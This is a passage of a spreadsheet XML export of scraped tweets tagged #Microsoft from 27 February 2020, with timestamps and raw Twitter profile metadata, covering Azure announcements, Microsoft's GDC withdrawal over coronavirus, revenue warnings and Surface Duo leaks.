    <t>#AI #Azure #microsoft     Is the cost of infrastructure keeping you from using AI to realize the full potential of your data? With Azure, you can pay for only the space you need and scale up as soon as you're ready. https://t.co/9eHdHPHhM4</t>
  </si>
  <si>
    <t>Thu Feb 27 18:50:07 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft withdraws from GDC #gaming conference over coronavirus concerns https://t.co/BPXw1arPpy https://t.co/iJIrRqKgoZ</t>
  </si>
  <si>
    <t>Thu Feb 27 18:49:29 +0000 2020</t>
  </si>
  <si>
    <t>Final session on the #dutchsecmeetup with Dimitri Lambrecht telling about When the sh*t hits the fan.. in real life scenarios #security #malware #microsoft #weareinspark https://t.co/XsgJWxaWTg</t>
  </si>
  <si>
    <t>Thu Feb 27 18:48:29 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft pulls out of Game Developers Conference due to #coronavirus risk https://t.co/MYlBHz2yVk</t>
  </si>
  <si>
    <t>Thu Feb 27 18:48:20 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #WIMVP Implementing strong user authentication with #WindowsHello for Business https://t.co/Lv3J4ij4jb</t>
  </si>
  <si>
    <t>Thu Feb 27 18:47:19 +0000 2020</t>
  </si>
  <si>
    <t>Flash whitepaper: Why MFA is a top priority in 2020 https://t.co/SFSCdk9TaU #Microsoft</t>
  </si>
  <si>
    <t>Microsoft 365 Business Update - February 2020 https://t.co/mAWv3kiNE9 #Microsoft</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/IFPqdazVdL #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 18:47:09 +0000 2020</t>
  </si>
  <si>
    <t>Flash whitepaper: Why MFA is a top priority in 2020 https://t.co/dIL5Tx2znY #AzureAD #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 18:46:54 +0000 2020</t>
  </si>
  <si>
    <t>After flying in space twice, #Microsoft billionaire Charles Simonyi follows his passion... https://t.co/tYB6p6bCzv</t>
  </si>
  <si>
    <t>Thu Feb 27 18:46:17 +0000 2020</t>
  </si>
  <si>
    <t>Awesome turnout at our #Microsoft #Azure Synapse Analytics in a Day event yesterday. Feeling a case of #fomo? Check out our upcoming events https://t.co/Pj8F3RQCY0 https://t.co/Y1X9yII3JA</t>
  </si>
  <si>
    <t>{'id': 262390851, 'id_str': '262390851', 'name': 'Artis Consulting', 'screen_name': 'ArtisConsulting', 'location': 'Dallas, TX', 'description': 'We guide you on a path to #DigitalTransformation thru analytics, app development &amp; collab #IoT #Office365 #PowerBI #Azure #Microsoft https://t.co/nZozLxd0s3', 'url': 'http://t.co/BUamI3Nbha', 'entities': {'url': {'urls': [{'url': 'http://t.co/BUamI3Nbha', 'expanded_url': 'http://www.artisconsulting.com', 'display_url': 'artisconsulting.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/nZozLxd0s3', 'expanded_url': 'http://goo.gl/Cy9DAc', 'display_url': 'goo.gl/Cy9DAc', 'indices': [133, 156]}]}}, 'protected': False, 'followers_count': 254, 'friends_count': 372, 'listed_count': 21, 'created_at': 'Mon Mar 07 23:38:38 +0000 2011', 'favourites_count': 212, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 327,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'http://pbs.twimg.com/profile_images/854390952735031301/UKXmLp9c_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/854390952735031301/UKXmLp9c_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/262390851/1461590462',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</si>
  <si>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18:46:00 +0000 2020</t>
  </si>
  <si>
    <t>Great to hear the panel of Women in manufacturing today at #envisionmfg #microsoft #accenture https://t.co/ExXyMRaBfs</t>
  </si>
  <si>
    <t>{'id': 42976878, 'id_str': '42976878', 'name': 'Clint', 'screen_name': 'islandclint', 'location': '', 'description': 'MSU Alum, Eli Broad EMBA, Geek, Learner, Technologist, and Friend. Budding Runner and 5x Grand Canyon Hiker N-S rim', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 323, 'friends_count': 1298, 'listed_count': 19, 'created_at': 'Wed May 27 21:56:28 +0000 2009', 'favourites_count': 3837, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2390,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'http://pbs.twimg.com/profile_images/378800000717103746/74acb06cea8beaa1831e26d979dac111_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000717103746/74acb06cea8beaa1831e26d979dac111_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/42976878/1570629422',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</si>
  <si>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18:45:29 +0000 2020</t>
  </si>
  <si>
    <t>Flash whitepaper: Why MFA is a top priority in 2020 https://t.co/qM0DIx4skm #Microsoft #IdentityManagement #AccessManagement</t>
  </si>
  <si>
    <t>Thu Feb 27 18:45:24 +0000 2020</t>
  </si>
  <si>
    <t>Which Web browser gives you the best privacy? https://t.co/NRN8rRUiX8  #Privacy  #Security  #Browser  #Chrome  #Firefox  #Edge  #Opera  #Brave  #Microsoft  #Google  #InfoSec</t>
  </si>
  <si>
    <t>{'id': 2704509944, 'id_str': '2704509944', 'name': 'K7KE', 'screen_name': '_K7KE_', 'location': 'DM35SG', 'description': 'The world of ham radio HF. Avid DXer. DX contester. Formerly  K6QQQ -- &amp; WA6OHJ from the 60s. Always vigilant when it comes to online security and privacy.', 'url': 'https://t.co/LpJnn4iZeY', 'entities': {'url': {'urls': [{'url': 'https://t.co/LpJnn4iZeY', 'expanded_url': 'https://k7ke.com', 'display_url': 'k7ke.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 102, 'friends_count': 23, 'listed_count': 13, 'created_at': 'Sun Aug 03 16:57:26 +0000 2014', 'favourites_count': 192, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2350,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'http://pbs.twimg.com/profile_images/691780721657143296/vjPx-uB6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/691780721657143296/vjPx-uB6_normal.jpg',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</si>
  <si>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18:45:10 +0000 2020</t>
  </si>
  <si>
    <t>Meet us at booth #526 at @MS_Ignite The Tour in Amsterdam to learn more about our solution that improves the performance of your most critical #Microsoft applications and services. Book a meeting with one of our experts at the event: https://t.co/Of4zHWufyr #MSIgniteTheTour https://t.co/cYo0psCIZA</t>
  </si>
  <si>
    <t>{'id': 240023428, 'id_str': '240023428', 'name': 'Martello Tech', 'screen_name': 'MartelloTech', 'location': 'Ottawa, Ontario', 'description': 'Delivering confidence in the performance of real-time services on cloud and enterprise networks. $MTLO', 'url': 'http://t.co/zCxhBYF2S4', 'entities': {'url': {'urls': [{'url': 'http://t.co/zCxhBYF2S4', 'expanded_url': 'http://martellotech.com/', 'display_url': 'martellotech.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1286, 'friends_count': 449, 'listed_count': 159, 'created_at': 'Wed Jan 19 00:16:11 +0000 2011', 'favourites_count': 2455, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8056, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme12/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme12/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/973196776835551232/cItxlIGA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/973196776835551232/cItxlIGA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/240023428/1547230491', 'profile_link_color': 'D12127', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFF7CC', 'profile_text_color': '0C3E53', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 18:43:28 +0000 2020</t>
  </si>
  <si>
    <t>We are retiring Azure AD Domain Services classic VNET support on March 1, 2023  https://t.co/SlT2vo66cN  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Azure Site Recovery data encryption feature will be retired April 30, 2022  https://t.co/gvoGjk1WBG  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Thu Feb 27 18:42:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Issues Financial Warning Because of #Coronavirus https://t.co/bSSddLGXXr</t>
  </si>
  <si>
    <t>{'id': 268792491, 'id_str': '268792491', 'name': 'Man w/o a Plan', 'screen_name': 'MidWestMet', 'location': 'Illinois', 'description': "Eh, I never thought I'd live this long...", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 390, 'friends_count': 631, 'listed_count': 32, 'created_at': 'Sat Mar 19 13:38:31 +0000 2011', 'favourites_count': 73086, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 43722,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'http://pbs.twimg.com/profile_images/1133503992150089729/PDN0VIAv_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1133503992150089729/PDN0VIAv_normal.png',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</si>
  <si>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18:37:24 +0000 2020</t>
  </si>
  <si>
    <t>@janewells @j2lovesfriday @TheDomino @CourtReagan What is everybody waiting for? $msft already done it #Elections2020 #Microsoft</t>
  </si>
  <si>
    <t>{'id': 260824491, 'id_str': '260824491', 'name': 'Gary Tan âš½ï¸ðŸƒðŸ§¸ðŸ’µðŸ—½ðŸ‡ºðŸ‡¸', 'screen_name': 'ahkautan', 'location': 'Gary, Indiana', 'description': 'i learn from bulls and bears. tune out politics and get back to helping real life folks. tune out douche.', 'url': 'https://t.co/CFmd4rwpBv', 'entities': {'url': {'urls': [{'url': 'https://t.co/CFmd4rwpBv', 'expanded_url': 'http://countryOVERparty.us', 'display_url': 'countryOVERparty.us', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 205, 'friends_count': 500, 'listed_count': 12, 'created_at': 'Fri Mar 04 17:41:43 +0000 2011', 'favourites_count': 1551, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 20691,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'http://pbs.twimg.com/profile_images/1745775642/red_ribbon__1__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1745775642/red_ribbon__1__normal.jpg',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</si>
  <si>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18:36:03 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/kaq4zAX6j2 via @hybrid_ts #Azure #Microsoft https://t.co/j6VNWQ6ILR</t>
  </si>
  <si>
    <t>Thu Feb 27 18:35:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts Android Surface Duo: This is how youll peek at messages and calls. Check out these leaked videos showing features for #Microsofts first foldable smartphone. @ZDNet @LiamT #SurfaceDuo https://t.co/sAyRpkSK8x</t>
  </si>
  <si>
    <t>{'id': 108406584, 'id_str': '108406584', 'name': 'wearemgp', 'screen_name': 'MercuryGlobal', 'location': 'San Francisco, London, Amsterdam', 'description': "MGP is a boutique PR firm specialized in emerging technologies. Over the past 10+ years, we've helped more than 30 companies to exit. Are you next?", 'url': 'https://t.co/cMrssDUqRL', 'entities': {'url': {'urls': [{'url': 'https://t.co/cMrssDUqRL', 'expanded_url': 'http://www.wearemgp.com', 'display_url': 'wearemgp.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 598, 'friends_count': 1392, 'listed_count': 253, 'created_at': 'Mon Jan 25 21:11:30 +0000 2010', 'favourites_count': 222, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8627, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EBEBEB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/967998805348986882/9dbUkFrb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/967998805348986882/9dbUkFrb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/108406584/1519623763', 'profile_link_color': 'E81C4F',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</si>
  <si>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Thu Feb 27 18:34:57 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure Site Recovery data encryption feature will be retired April 30, 2022 https://t.co/BfXq27z6Z9</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: We are retiring Azure AD Domain Services classic VNET support on March 1, 2023 https://t.co/GV2Qx2HRaT</t>
  </si>
  <si>
    <t>Thu Feb 27 18:33:59 +0000 2020</t>
  </si>
  <si>
    <t>Join us for an evening of interesting talks: Hybrid architectures and Azure Arc by @JussiRoine. Sign up  #Azure #TDFinland #Microsoft https://t.co/2YxekWdqkG</t>
  </si>
  <si>
    <t>{'id': 179464589, 'id_str': '179464589', 'name': 'Gofore', 'screen_name': 'GoforeGroup', 'location': 'Brunswick, Helsinki, JyvÃ¤skylÃ¤, Madrid, Munich, Tallinn, Tampere, Turku', 'description': 'We innovate, improve and incite change in our society, our workplaces and the way we work. Join us in positive impact! #goforecrew #positiveimpact', 'url': 'https://t.co/YDSbZ2L6iz', 'entities': {'url': {'urls': [{'url': 'https://t.co/YDSbZ2L6iz', 'expanded_url': 'http://www.gofore.com/', 'display_url': 'gofore.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4044, 'friends_count': 1663, 'listed_count': 95, 'created_at': 'Tue Aug 17 10:37:41 +0000 2010', 'favourites_count': 5582, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4066,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'http://pbs.twimg.com/profile_images/1226481689918156802/kNY3Roje_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226481689918156802/kNY3Roje_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/179464589/1577964679', 'profile_link_color': 'F27500', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '262B2D', 'profile_text_color': 'ADAFB0', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 18:33:26 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft bad edge and service and server and outlook and mail app it's down right now</t>
  </si>
  <si>
    <t>Thu Feb 27 18:32:27 +0000 2020</t>
  </si>
  <si>
    <t>Azure Site Recovery data encryption feature will be retired April 30, 2022: https://t.co/uE1SkzHpwk #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 18:32:26 +0000 2020</t>
  </si>
  <si>
    <t>We are retiring Azure AD Domain Services classic VNET support on March 1, 2023: https://t.co/zYROD20hwr #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 18:31:42 +0000 2020</t>
  </si>
  <si>
    <t>Now #Microsoft Game Stack cancels #GDC2020 appearance https://t.co/MPiguvMz2G</t>
  </si>
  <si>
    <t>{'id': 18421880, 'id_str': '18421880', 'name': 'Wanda Meloni', 'screen_name': 'wandameloni', 'location': 'California, USA', 'description': 'Analyst/Futurist: Graphics, Content, Future Computing. #funding #graphics #VR #AR #mobile #PC #VFX #games #enterprise #cloud @M2Insights', 'url': 'https://t.co/4umuSmbiRf', 'entities': {'url': {'urls': [{'url': 'https://t.co/4umuSmbiRf', 'expanded_url': 'http://www.m2-insights.com/', 'display_url': 'm2-insights.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1908, 'friends_count': 2030, 'listed_count': 237, 'created_at': 'Sun Dec 28 04:28:23 +0000 2008', 'favourites_count': 1003, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5058,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'http://pbs.twimg.com/profile_images/3121848655/6d6a24f67d8519a74f1a72bfa5bdbeaa_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3121848655/6d6a24f67d8519a74f1a72bfa5bdbeaa_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18421880/1578192797', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'D3C74A', 'profile_sidebar_fill_color': 'E2D074', 'profile_text_color': '362720', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 18:31:23 +0000 2020</t>
  </si>
  <si>
    <t>We are retiring Azure AD Domain Services classic VNET support on March 1, 2023 https://t.co/YaIg4kidRC  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>{'id': 416033787, 'id_str': '416033787', 'name': 'â˜ CHARBEL NEMNOMðŸ‡¨ðŸ‡­MVP â˜', 'screen_name': 'CHARBELNEMNOM', 'location': 'Switzerland', 'description': 'Cloud Architect @itnetX_CH, ICT Security Expert and proud #Microsoft #Azure #MVP and #CDM. Speaker, blogger, and author. Azure, Azure Stack and Automation.', 'url': 'https://t.co/QHkZo2zvqS', 'entities': {'url': {'urls': [{'url': 'https://t.co/QHkZo2zvqS', 'expanded_url': 'https://charbelnemnom.com/', 'display_url': 'charbelnemnom.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2938, 'friends_count': 3382, 'listed_count': 153, 'created_at': 'Sat Nov 19 04:28:56 +0000 2011', 'favourites_count': 16188, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7572,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'http://pbs.twimg.com/profile_images/1006984649602686976/C1FKZI9E_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1006984649602686976/C1FKZI9E_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/416033787/1571816259',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</si>
  <si>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Azure Site Recovery data encryption feature will be retired April 30, 2022 https://t.co/J9IdFrM5AP  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Thu Feb 27 18:30:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and #Lenovo have teamed up to validate the #Lenovo #ThinkSystem SE350 for Microsoft's Azure Stack HCI program. #LenovoDataCenter https://t.co/vM3j21JOQf #WeAreLenovo</t>
  </si>
  <si>
    <t>{'id': 398996998, 'id_str': '398996998', 'name': 'MEugenia San Roman', 'screen_name': 'Marusanroman', 'location': 'Comunidad de Madrid, EspaÃ±a', 'description': 'EMEA Business Operations @Lenovo Data Center Group @LenovoServers . Tweets r my own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 302, 'friends_count': 620, 'listed_count': 72, 'created_at': 'Wed Oct 26 20:58:53 +0000 2011', 'favourites_count': 10772, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13913,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'http://pbs.twimg.com/profile_images/1608200094/foto1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1608200094/foto1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/398996998/1458387547',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</si>
  <si>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18:30:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to invest $1.1bn in Mexico's for its first data center, #Google to invest $10b for another datacenter, #Ai and #CloudComputing will be the future for #dataeconomy industries https://t.co/JxJxJ2gzwt</t>
  </si>
  <si>
    <t>{'id': 18415624, 'id_str': '18415624', 'name': 'Eddy D. SÃ¡nchez', 'screen_name': 'eddysan', 'location': 'La Paz, Bolivia', 'description': 'Co-founder at smartup, Convergence(#AI + #Blockchain + #Biotech) ~ #DataEconomy | #StartupWeekend #EdTech #FutureLiteracy', 'url': 'https://t.co/avgop3fMsZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/avgop3fMsZ', 'expanded_url': 'https://medium.com/@eddysan', 'display_url': 'medium.com/@eddysan', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2019, 'friends_count': 942, 'listed_count': 127, 'created_at': 'Sat Dec 27 22:02:43 +0000 2008', 'favourites_count': 1048, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13673,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'http://pbs.twimg.com/profile_images/833322485798039554/Tn9KnvM2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/833322485798039554/Tn9KnvM2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18415624/1491660368',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</si>
  <si>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18:28:14 +0000 2020</t>
  </si>
  <si>
    <t>@kevin_scott @satyanadella @kevin_scott 
Before trying to keep the #American dream alive, try to work harder on your team to make #Microsoft #Outlook support better, that would help you, Microsoft, to keep your dreams alive in the first place
7days passed and no reply from your support team!</t>
  </si>
  <si>
    <t>{'id': 561093261, 'id_str': '561093261', 'name': 'Abdel Majid Suckar', 'screen_name': 'asuckar', 'location': 'Syria, Morocco, Lebanon', 'description': 'Information Technology Engineer - Artificial Intelligence Department', 'url': 'https://t.co/go5seR92V9', 'entities': {'url': {'urls': [{'url': 'https://t.co/go5seR92V9', 'expanded_url': 'https://plus.google.com/app/basic/105695556143698930216/about', 'display_url': 'plus.google.com/app/basic/1056â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 39, 'listed_count': 3, 'created_at': 'Mon Apr 23 10:27:07 +0000 2012', 'favourites_count': 29, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 906,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'http://pbs.twimg.com/profile_images/467773383217012736/sqqSz1ah_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/467773383217012736/sqqSz1ah_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/561093261/1376837052',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</si>
  <si>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18:28:01 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/YUp6vody5f #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 18:27:49 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/TDPXdfA6yQ #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 18:26:59 +0000 2020</t>
  </si>
  <si>
    <t>Company earnings expected to be impacted by #COVID19 
#Microsoft
#Apple 
#Mastercard 
#Starbucks
#McDonald's
#Coca-Cola
#Nike
#Expedia
#HP Inc.
#Walt Disney Co
#Walmart Inc.
#Visa Inc.
#TripAdvisor Inc.
#Procter &amp;amp; Gamble Co</t>
  </si>
  <si>
    <t>{'id': 946681487876919296, 'id_str': '946681487876919296', 'name': 'Recommendedforex', 'screen_name': 'Forex_trader_4u', 'location': '', 'description': 'Choose the right UK forex, cryptocurrency broker and MT4 trading platform. We find trusted FCA reg brokers with competitive spreads..', 'url': 'https://t.co/3wzIJd6qgT', 'entities': {'url': {'urls': [{'url': 'https://t.co/3wzIJd6qgT', 'expanded_url': 'http://recommendedforex.com', 'display_url': 'recommendedforex.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 63, 'friends_count': 417, 'listed_count': 0, 'created_at': 'Fri Dec 29 09:57:10 +0000 2017', 'favourites_count': 2757, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2520,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'http://pbs.twimg.com/profile_images/1081592011118006272/oFBLc2IJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1081592011118006272/oFBLc2IJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/946681487876919296/1514545082',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</si>
  <si>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18:26:27 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft said it may miss its revenue guidance for the upcoming quarter on coronavirus-related pressure on Microsoft's Windows and Surface hardware businesses. #microsoft https://t.co/xe3yln57yY https://t.co/sQIvO3MCo6</t>
  </si>
  <si>
    <t>Thu Feb 27 18:26:14 +0000 2020</t>
  </si>
  <si>
    <t>Image by @SMFR2240 via #Microsoft #Lumia 650</t>
  </si>
  <si>
    <t>{'id': 192444710, 'id_str': '192444710', 'name': 'Saman Mokhtabad', 'screen_name': 'SMFR2240', 'location': 'New York, USA', 'description': 'Master of Science in RF Electronics;\nWebsite designer and developer;\n\nhttps://t.co/ydkFNn0gdz', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/ydkFNn0gdz', 'expanded_url': 'https://doi.org/10.1049/iet-cds.2016.0394', 'display_url': 'doi.org/10.1049/iet-cdâ€¦', 'indices': [70, 93]}]}}, 'protected': False, 'followers_count': 5, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Sun Sep 19 04:44:18 +0000 2010', 'favourites_count': 114, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 167,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'http://pbs.twimg.com/profile_images/840624228718247936/p0oXKoWm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/840624228718247936/p0oXKoWm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/192444710/1486131879',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</si>
  <si>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18:26:06 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone  https://t.co/rielCiNLGC  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Thu Feb 27 18:24:04 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/bJerJYDCRl #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 18:21:42 +0000 2020</t>
  </si>
  <si>
    <t>We are retiring Azure AD Domain Services classic VNET support on March 1, 2023  https://t.co/nWtt9dYvIv  #azure #microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 18:21:41 +0000 2020</t>
  </si>
  <si>
    <t>Azure Site Recovery data encryption feature will be retired April 30, 2022  https://t.co/HOiHpwzukb  #azure #microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 18:21:02 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone  https://t.co/WIW71QP678  #azure #microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 18:19:15 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own #Cloud-based global backbone. #Microsoft #Azure #MSFTadvocate #Networking
https://t.co/rPg3MbhwE1</t>
  </si>
  <si>
    <t>Thu Feb 27 18:18:43 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/hZfR0GGNQL  #Cloud #CloudComputing #Azure #Microsoft via Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 18:15:13 +0000 2020</t>
  </si>
  <si>
    <t>Do you really want a folding phone? No me neither ! Surface Duo phone peek feature leaked, prodding all other foldables https://t.co/yRLG9NqGX5 #microsoft #smartphone #devices #tech #future https://t.co/ZuwosKPgO4</t>
  </si>
  <si>
    <t>Thu Feb 27 18:15:09 +0000 2020</t>
  </si>
  <si>
    <t>Blood, sweat and tears brought us here - but now we are ready! Our brand new web-based tool for easy #datasync from #MicrosoftDynamics365 #CRM to #SharePoint. Are you ready to smoove? Check it out: https://t.co/5BmYvLbVP8
#Microsoft #MicrosoftCRM #Software #IT #Layer2Smoove https://t.co/ob0pbeb7Z9</t>
  </si>
  <si>
    <t>{'id': 756442679421071360, 'id_str': '756442679421071360', 'name': 'Layer2 leading solutions.', 'screen_name': 'Layer2Solutions', 'location': 'Hamburg, Deutschland', 'description': 'Layer2 is a specialist for creating custom components and solutions for Microsoft SharePoint, Office 365 &amp; more.  Data Integration - Synchronization - Backup', 'url': 'https://t.co/OdzfHrGixt', 'entities': {'url': {'urls': [{'url': 'https://t.co/OdzfHrGixt', 'expanded_url': 'http://www.layer2solutions.com', 'display_url': 'layer2solutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 367, 'friends_count': 520, 'listed_count': 42, 'created_at': 'Fri Jul 22 10:56:03 +0000 2016', 'favourites_count': 165, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 464,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'http://pbs.twimg.com/profile_images/927523463644024833/NuwixiqX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/927523463644024833/NuwixiqX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/756442679421071360/1568628217', 'profile_link_color': '323584',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</si>
  <si>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18:14:49 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach enables customers of all sizes to utilize the power and scale of #Microsoft's global network to build a private, #Cloud-based global backbone. https://t.co/n6Sc0voayb</t>
  </si>
  <si>
    <t>Thu Feb 27 18:14:46 +0000 2020</t>
  </si>
  <si>
    <t>The number one complaint I hear in customer service is your team reads from scripts. Theyre not reading from a script, its just so dictated, [that] it sounds scripted." - Former #Microsoft contact center leader Dee Nilles told us. #AgentEngagement
https://t.co/5cPKlQpXLm https://t.co/21YN1xLIKy</t>
  </si>
  <si>
